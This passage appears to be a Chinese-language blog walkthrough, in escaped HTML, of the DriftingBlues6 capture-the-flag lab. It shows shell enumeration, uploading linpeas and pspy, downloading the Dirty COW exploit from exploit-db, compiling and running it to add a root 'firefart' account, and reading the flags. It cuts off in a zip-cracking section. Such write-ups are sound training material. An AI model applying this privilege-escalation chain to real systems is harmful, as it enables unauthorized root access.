src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412140646208\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u5230\u6211\u4eec\u7684shell\u4e86\uff0c\u70b9\u51fb\u6fc0\u6d3b\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427839.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427839.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412140718854\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f39\u56de\u6765\u4e86\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/$ pwd \n\/\n(remote) www-data@driftingblues:\/$ cd \/var\/www\/html\nbash: cd: \/var\/www\/html: No such file or directory\n(remote) www-data@driftingblues:\/$ cd \/var\/\n(remote) www-data@driftingblues:\/var$ ls\nbackups  cache  get.zip  lib  local  lock  log  mail  opt  run  spool  tmp  www\n(remote) www-data@driftingblues:\/var$ mail\nNo mail for www-data\n(remote) www-data@driftingblues:\/var$ cd www\n(remote) www-data@driftingblues:\/var\/www$ ls -la\ntotal 80\ndrwxr-xr-x  3 root root  4096 Mar 17  2021 .\ndrwxr-xr-x 12 root root  4096 Mar 17  2021 ..\n-rw-r--r--  1 root root 53656 Mar 15  2021 db.png\n-rw-r--r--  1 root root   750 Mar 15  2021 index.html\n-rw-r--r--  1 root root   110 Mar 15  2021 robots.txt\n-rw-r--r--  1 root root   179 Mar 15  2021 spammer.zip\ndrwxr-xr-x  7 root root  4096 Sep 13  2020 textpattern\n(remote) www-data@driftingblues:\/var\/www$ cd \/home\n(remote) www-data@driftingblues:\/home$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Mar 17  2021 .\ndrwxr-xr-x 23 root root 4096 Mar 17  2021 ..\n(remote) www-data@driftingblues:\/home$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/sbin\/exim4\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/pt_chown\n\/usr\/lib\/openssh\/ssh-keysign\n\/bin\/ping\n\/bin\/mount\n\/bin\/umount\n\/bin\/su\n\/bin\/ping6\n(remote) www-data@driftingblues:\/home$ sudo -l\nbash: sudo: command not found\n(remote) www-data@driftingblues:\/home$ \/usr\/sbin\/getcap -r \/dev\/null\nbash: \/usr\/sbin\/getcap: No such file or directory\n(remote) www-data@driftingblues:\/home$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# m h dom mon dow user  command\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@driftingblues:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh\nbin:x:2:2:bin:\/bin:\/bin\/sh\nsys:x:3:3:sys:\/dev:\/bin\/sh\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/bin\/sh\nman:x:6:12:man:\/var\/cache\/man:\/bin\/sh\nlp:x:7:7:lp:\/var\/spool\/lpd:\/bin\/sh\nmail:x:8:8:mail:\/var\/mail:\/bin\/sh\nnews:x:9:9:news:\/var\/spool\/news:\/bin\/sh\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/bin\/sh\nproxy:x:13:13:proxy:\/bin:\/bin\/sh\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/sh\nbackup:x:34:34:backup:\/var\/backups:\/bin\/sh\nlist:x:38:38:Mailing List Manager:\/var\/list:\/bin\/sh\nirc:x:39:39:ircd:\/var\/run\/ircd:\/bin\/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/bin\/sh\nnobody:x:65534:65534:nobody:\/nonexistent:\/bin\/sh\nlibuuid:x:100:101::\/var\/lib\/libuuid:\/bin\/sh\nDebian-exim:x:101:103::\/var\/spool\/exim4:\/bin\/false\nmysql:x:102:105:MySQL Server,,,:\/nonexistent:\/bin\/false\n(remote) www-data@driftingblues:\/home$ find \/ -writable -type f 2&gt;\/dev\/null\n\/var\/www\/textpattern\/files\/reverseShell.php\n\/proc\/1\/task\/1\/attr\/current\n\/proc\/1\/task\/1\/attr\/exec\n\/proc\/1\/task\/1\/attr\/fscreate\n........<\/code><\/pre>\n<p>\u4e00\u65e0\u6240\u83b7\uff0c\u5c1d\u8bd5\u8fdb\u4e00\u6b65\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/home$ cd \/\n(remote) www-data@driftingblues:\/$ ls\nbin  boot  dev  etc  home  initrd.img  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  selinux  srv  sys  tmp  usr  var  vmlinuz\n(remote) www-data@driftingblues:\/$ cd opt\n(remote) www-data@driftingblues:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Mar 17  2021 .\ndrwxr-xr-x 23 root root 4096 Mar 17  2021 ..\n(remote) www-data@driftingblues:\/opt$ cd ..\/tmp;ls -la\ntotal 8\ndrwxrwxrwt  2 root root 4096 Apr 12 01:09 .\ndrwxr-xr-x 23 root root 4096 Mar 17  2021 ..\n(remote) www-data@driftingblues:\/tmp$ cd \/usr\/local\n(remote) www-data@driftingblues:\/usr\/local$ ls -la\ntotal 40\ndrwxrwsr-x 10 root staff 4096 Mar 17  2021 .\ndrwxr-xr-x 10 root root  4096 Mar 17  2021 ..\ndrwxrwsr-x  2 root staff 4096 Mar 17  2021 bin\ndrwxrwsr-x  2 root staff 4096 Mar 17  2021 etc\ndrwxrwsr-x  2 root staff 4096 Mar 17  2021 games\ndrwxrwsr-x  2 root staff 4096 Mar 17  2021 include\ndrwxrwsr-x  3 root staff 4096 Mar 17  2021 lib\nlrwxrwxrwx  1 root staff    9 Mar 17  2021 man -&gt; share\/man\ndrwxrwsr-x  2 root staff 4096 Mar 17  2021 sbin\ndrwxrwsr-x  5 root staff 4096 Mar 17  2021 share\ndrwxrwsr-x  2 root staff 4096 Mar 17  2021 src\n(remote) www-data@driftingblues:\/usr\/local$ cd share\/\n(remote) www-data@driftingblues:\/usr\/local\/share$ ls -la\ntotal 20\ndrwxrwsr-x  5 root staff 4096 Mar 17  2021 .\ndrwxrwsr-x 10 root staff 4096 Mar 17  2021 ..\ndrwxrwsr-x  2 root staff 4096 Mar 17  2021 man\ndrwxrwsr-x  7 root staff 4096 Mar 17  2021 sgml\ndrwxrwsr-x  6 root staff 4096 Mar 17  2021 xml\n(remote) www-data@driftingblues:\/usr\/local\/share$ file *\nbash: file: command not found<\/code><\/pre>\n<h3>\u4e0a\u4f20pspy64\u4ee5\u53calinpeas.sh<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/usr\/local\/share$ cd \/tmp\n(remote) www-data@driftingblues:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/driftingblues6\n(local) pwncat$ lcd ..\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? \u2022 0:00:00[02:15:05] uploaded 860.55KiB in 0.64 seconds                                                                                               upload.py:76\n(local) pwncat$ upload pspy64\n.\/pspy64 \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 4.5\/4.5 MB \u2022 3.3 MB\/s \u2022 0:00:00[02:15:09] uploaded 4.47MiB in 1.65 seconds                                                                                                 upload.py:76\n(local) pwncat$                                                                                                                                         \n(remote) www-data@driftingblues:\/tmp$ chmod +x *\n(remote) www-data@driftingblues:\/tmp$ .\/linpeas.sh \n\n                            \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n                    \u2584\u2584\u2584\u2584\u2584\u2584\u2584             \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n             \u2584\u2584\u2584\u2584\u2584\u2584\u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584     \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584    \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584       \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584          \u2584\u2584\u2584\u2584\u2584\u2584               \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584              \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                 \u2584\u2584\u2584\u2584 \n         \u2584\u2584                  \u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584                  \u2584\u2584\u2584\n         \u2584\u2584                \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                  \u2584\u2584\n         \u2584            \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584   \u2584\u2584\n         \u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                                \u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584                       \u2584\u2584\u2584\u2584\u2584\u2584     \u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584                       \u2584\u2584\u2584\u2584\u2584      \u2584 \u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584        \u2584\u2584\u2584\u2584\u2584\u2584\u2584        \u2584\u2584\u2584\u2584\u2584     \u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584 \n          \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584        \u2584          \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                       \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584                         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n         \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n          \u2580\u2580\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\u2580\u2580\u2580\u2580\n               \u2580\u2580\u2580\u2584\u2584\u2584\u2584\u2584      \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\n                     \u2580\u2580\u2580\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\u2580\n\n    \/---------------------------------------------------------------------------------\\\n    |                             Do you like PEASS?                                  |\n    |---------------------------------------------------------------------------------|\n    |         Get the latest version    :     https:\/\/github.com\/sponsors\/carlospolop |\n    |         Follow on Twitter         :     @hacktricks_live                        |\n    |         Respect on HTB            :     SirBroccoli                             |\n    |---------------------------------------------------------------------------------|\n    |                                 Thank you!                                      |\n    \\---------------------------------------------------------------------------------\/\n          linpeas-ng by carlospolop\n\nADVISORY: This script should be used for authorized penetration testing and\/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and\/or with the computer owner&#039;s permission.\n\nLinux Privesc Checklist: https:\/\/book.hacktricks.xyz\/linux-hardening\/linux-privilege-escalation-checklist\n LEGEND:\n  RED\/YELLOW: 95% a PE vector\n  RED: You should take a look to it\n  LightCyan: Users with console\n  Blue: Users without console &amp; mounted devs\n  Green: Common things (users, groups, SUID\/SGID, mounts, .sh scripts, cronjobs) \n  LightMagenta: Your username\n\n Starting linpeas. Caching Writable Folders...\n\n.\/linpeas.sh: 485: .\/linpeas.sh: Syntax error: &quot;fi&quot; unexpected\n(remote) www-data@driftingblues:\/tmp$ .\/pspy64 \nSegmentation fault<\/code><\/pre>\n<p>\u5bc4\u3002\u3002\u3002\u3002\u67e5\u770b\u4e00\u4e0b\u5185\u6838\uff1f<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/tmp$ uname -a\nLinux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU\/Linux<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u9776\u673a\u53d1\u5e03\u65f6\u95f4\uff1a<\/p>\n<pre><code class=\"language-apl\">2021-03-17<\/code><\/pre>\n<p>\u627e\u4e00\u4e0b\u6f0f\u6d1e\u5728\u8fd9\u4e4b\u524d\u7684\u5427\uff0c\u5b9e\u5728\u4e0d\u884c\u5c31\u770bwp\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427840.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427840.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412141821597\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u810f\u725b\u63d0\u6743<\/h3>\n<p>\u660e\u663e\u8fd9\u4e2a\u6f0f\u6d1e\u5f88\u65e9\u4e86\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ wget https:\/\/www.exploit-db.com\/download\/40839                                                                               \n--2024-04-12 02:19:20--  https:\/\/www.exploit-db.com\/download\/40839\nResolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13\nConnecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 5006 (4.9K) [application\/txt]\nSaving to: \u201840839\u2019\n\n40839        100%[=========================================================================&gt;]   4.89K  --.-KB\/s    in 0s      \n\n2024-04-12 02:19:22 (288 MB\/s) - \u201840839\u2019 saved [5006\/5006]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ ls\n40839  48943.py  49620.py  creds.txt  db.png  hash.txt  revershell.php  spammer.zip  spammer.zip.tmp\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues6]\n\u2514\u2500$ mv 40839 exp.c<\/code><\/pre>\n<pre><code class=\"language-bash\"># attacked\n(remote) www-data@driftingblues:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\n(local) pwncat$ lcd driftingblues6\n(local) pwncat$                                                                                                                                         \n(remote) www-data@driftingblues:\/tmp$ \n(local) pwncat$ upload exp.c\n.\/exp.c \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 5.0\/5.0 KB \u2022 ? \u2022 0:00:00[02:20:09] uploaded 5.01KiB in 0.25 seconds                                                                                                 upload.py:76\n(local) pwncat$                                                                                                                                         \n(remote) www-data@driftingblues:\/tmp$ gcc exp.c -o exp\n\/tmp\/ccb68bKo.o: In function `generate_password_hash&#039;:\nexp.c:(.text+0x1e): undefined reference to `crypt&#039;\n\/tmp\/ccb68bKo.o: In function `main&#039;:\nexp.c:(.text+0x4cd): undefined reference to `pthread_create&#039;\nexp.c:(.text+0x501): undefined reference to `pthread_join&#039;\ncollect2: error: ld returned 1 exit status\n(remote) www-data@driftingblues:\/tmp$ chmod +x exp.c\n(remote) www-data@driftingblues:\/tmp$ gcc exp.c -o exp\n\/tmp\/ccy2hEqS.o: In function `generate_password_hash&#039;:\nexp.c:(.text+0x1e): undefined reference to `crypt&#039;\n\/tmp\/ccy2hEqS.o: In function `main&#039;:\nexp.c:(.text+0x4cd): undefined reference to `pthread_create&#039;\nexp.c:(.text+0x501): undefined reference to `pthread_join&#039;\ncollect2: error: ld returned 1 exit status<\/code><\/pre>\n<p>\u641c\u4e00\u4e0b\u76f8\u5173\u65b9\u6cd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427841.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427841.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412142247054\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427842.jpg'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427842.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"VeryCapture_20240412142331\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6309\u7167\u4e0a\u9762\u7684\u65b9\u5f0f\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/tmp$ gcc exp.c -o exp -lpthread\n\/tmp\/cc3KdcQ8.o: In function `generate_password_hash&#039;:\nexp.c:(.text+0x1e): undefined reference to `crypt&#039;\ncollect2: error: ld returned 1 exit status\n(remote) www-data@driftingblues:\/tmp$ gcc exp.c -o exp -lpthread -lcrypt\n(remote) www-data@driftingblues:\/tmp$ ls\nexp  exp.c  linpeas.sh  pspy64\n(remote) www-data@driftingblues:\/tmp$ chmod +x exp\n(remote) www-data@driftingblues:\/tmp$ .\/exp\n\/etc\/passwd successfully backed up to \/tmp\/passwd.bak\nPlease enter the new password: \nComplete line:\nfirefart:fiw.I6FqpfXW.:0:0:pwned:\/root:\/bin\/bash\n\nmmap: 7ff516e18000\nwhoami\n^C\n(remote) www-data@driftingblues:\/tmp$ su root\nNo passwd entry for user &#039;root&#039;\n(remote) www-data@driftingblues:\/tmp$ su firefart\nPassword: \nfirefart@driftingblues:\/tmp# whoami;id\nfirefart\nuid=0(firefart) gid=0(root) groups=0(root)\nfirefart@driftingblues:\/tmp# cd \/root\nfirefart@driftingblues:~# ls -la\ntotal 24\ndrwx------  3 firefart root 4096 Mar 17  2021 .\ndrwxr-xr-x 23 firefart root 4096 Mar 17  2021 ..\ndrwx------  2 firefart root 4096 Mar 17  2021 .aptitude\n-rw-------  1 firefart root   45 Mar 17  2021 .bash_history\n-r-x------  1 firefart root   32 Mar 13  2021 root.txt\n-r-x------  1 firefart root   32 Mar 13  2021 user.txt\nfirefart@driftingblues:~# cat .bash_history \nls\nbash logdel2 \nrm logdel2 \nshutdown -h now\nfirefart@driftingblues:~# cat .aptitude\/\ncat: .aptitude\/: Is a directory\nfirefart@driftingblues:~# cat root.txt \nCCAD89B795EE7BCF7BBAD5A46F40F488firefart@driftingblues:~# cat user.txt \n5355B03AF00225CFB210AE9CA8931E51firefart@driftingblues:~# cd .aptitude\/\nfirefart@driftingblues:~\/.aptitude# ls -la\ntotal 8\ndrwx------ 2 firefart root 4096 Mar 17  2021 .\ndrwx------ 3 firefart root 4096 Mar 17  2021 ..\n-rw-r--r-- 1 firefart root    0 Mar 17  2021 config\nfirefart@driftingblues:~\/.aptitude# cat config\nfirefart@driftingblues:~\/.aptitude# <\/code><\/pre>\n<p>\u62ff\u5230flag\u3002\u3002\u3002\u3002<\/p>\n<p>\u505a\u5b8c\u4e86\u4ee5\u540e\uff0c\u770b\u4e00\u4e0b\u5e08\u5085\u4eec\u7684\u597d\u50cf\u90fd\u662f\u7528\u8fd9\u4e2a\u63d0\u6743\u7684\uff0c\u5bb3\u3002<\/p>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<h3>Zipcracker<\/h3>\n<p>\u8fd9\u662f\u6211\u5728\u7f51\u4e0a\u627e\u5230\u7684\u7834\u89e3\u8f6f\u4ef6\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121427843.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 